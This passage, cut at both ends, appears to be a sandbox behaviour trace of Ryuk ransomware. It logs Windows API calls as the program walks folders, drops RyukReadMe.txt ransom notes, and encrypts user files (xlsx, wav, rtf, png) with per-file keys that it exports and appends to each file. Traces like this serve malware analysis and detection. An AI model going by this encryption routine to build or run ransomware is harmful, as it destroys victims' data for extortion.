hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.328] SetLastError (dwErrCode=0x0) [0151.328] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0151.329] GetLastError () returned 0x0 [0151.329] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0151.330] CloseHandle (hObject=0x188) returned 1 [0151.330] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0151.330] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0151.330] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0151.330] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.331] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\5S3 6vbF_ gwoOb0strD.xlsx", dwFileAttributes=0x80) returned 1 [0151.331] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\5S3 6vbF_ gwoOb0strD.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\5s3 6vbf_ gwoob0strd.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0151.331] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=17517) returned 1 [0151.331] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=17517) returned 1 [0151.331] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x434b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0151.332] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.332] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0151.332] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.333] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.333] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x446d, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x446d, lpOverlapped=0x0) returned 1 [0151.333] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0151.333] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x446d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x4470) returned 1 [0151.333] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.333] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4470, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x4470, lpOverlapped=0x0) returned 1 [0151.334] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0151.334] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0151.334] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0151.334] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0151.334] CloseHandle (hObject=0x18c) returned 1 [0151.352] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.357] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.357] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.357] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0151.357] SetLastError (dwErrCode=0x0) [0151.357] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0151.358] GetLastError () returned 0x0 [0151.358] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0151.359] CloseHandle (hObject=0x18c) returned 1 [0151.359] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0151.359] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0151.359] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0151.359] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.360] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\17Ts9UVtk7slJPTFg.wav", dwFileAttributes=0x80) returned 1 [0151.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\17Ts9UVtk7slJPTFg.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\edpd0cl\\17ts9uvtk7sljptfg.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0151.360] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=73104) returned 1 [0151.360] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=73104) returned 1 [0151.360] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x11c6e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.360] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0151.361] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.361] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0151.361] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.361] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.361] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x11d90, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x11d90, lpOverlapped=0x0) returned 1 [0151.363] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0151.363] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x11d90, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x11da0) returned 1 [0151.363] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.363] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11da0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x11da0, lpOverlapped=0x0) returned 1 [0151.364] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0151.364] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.364] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.364] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0151.364] CloseHandle (hObject=0x190) returned 1 [0151.379] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.383] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.383] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.383] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0151.383] SetLastError (dwErrCode=0x0) [0151.383] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\edpd0cl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0151.384] GetLastError () returned 0x0 [0151.384] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0151.385] CloseHandle (hObject=0x190) returned 1 [0151.385] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\iiXiax\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0151.385] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0151.385] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0151.385] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.385] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\iiXiax\\-42eHpzmX270WtPRLZo3.wav", dwFileAttributes=0x80) returned 1 [0151.385] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\iiXiax\\-42eHpzmX270WtPRLZo3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\edpd0cl\\iixiax\\-42ehpzmx270wtprlzo3.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0151.385] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=68651) returned 1 [0151.385] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=68651) returned 1 [0151.385] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x10b09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.385] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0151.386] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.386] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0151.386] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.386] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.386] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x10c2b, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x10c2b, lpOverlapped=0x0) returned 1 [0151.387] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0151.387] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x10c2b, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x10c30) returned 1 [0151.388] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.388] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10c30, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x10c30, lpOverlapped=0x0) returned 1 [0151.388] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0151.388] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0151.388] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0151.388] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0151.388] CloseHandle (hObject=0x194) returned 1 [0151.403] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.407] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.407] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.407] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0151.407] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.407] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\iiXiax\\bIn59YDkV.rtf", dwFileAttributes=0x80) returned 1 [0151.407] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\iiXiax\\bIn59YDkV.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\edpd0cl\\iixiax\\bin59ydkv.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0151.408] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=92485) returned 1 [0151.408] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=92485) returned 1 [0151.408] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x16823, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.408] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0151.408] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.408] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0151.408] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.409] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.409] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x16945, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x16945, lpOverlapped=0x0) returned 1 [0151.410] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0151.410] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x16945, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x16950) returned 1 [0151.410] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.410] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x16950, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x16950, lpOverlapped=0x0) returned 1 [0151.411] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0151.411] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0151.411] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0151.411] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0151.411] CloseHandle (hObject=0x194) returned 1 [0151.436] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.440] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.440] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.440] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0151.440] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.440] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\iiXiax\\MewPd3-LpSGdG.png", dwFileAttributes=0x80) returned 1 [0151.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\iiXiax\\MewPd3-LpSGdG.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\edpd0cl\\iixiax\\mewpd3-lpsgdg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0151.441] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=22544) returned 1 [0151.441] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=22544) returned 1 [0151.441] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x56ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.441] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0151.441] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.441] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0151.441] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.442] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.442] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5810, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x5810, lpOverlapped=0x0) returned 1 [0151.442] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0151.442] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x5810, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x5820) returned 1 [0151.442] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.442] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5820, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x5820, lpOverlapped=0x0) returned 1 [0151.442] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0151.442] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0151.442] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0151.443] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0151.443] CloseHandle (hObject=0x194) returned 1 [0151.459] VirtualFree 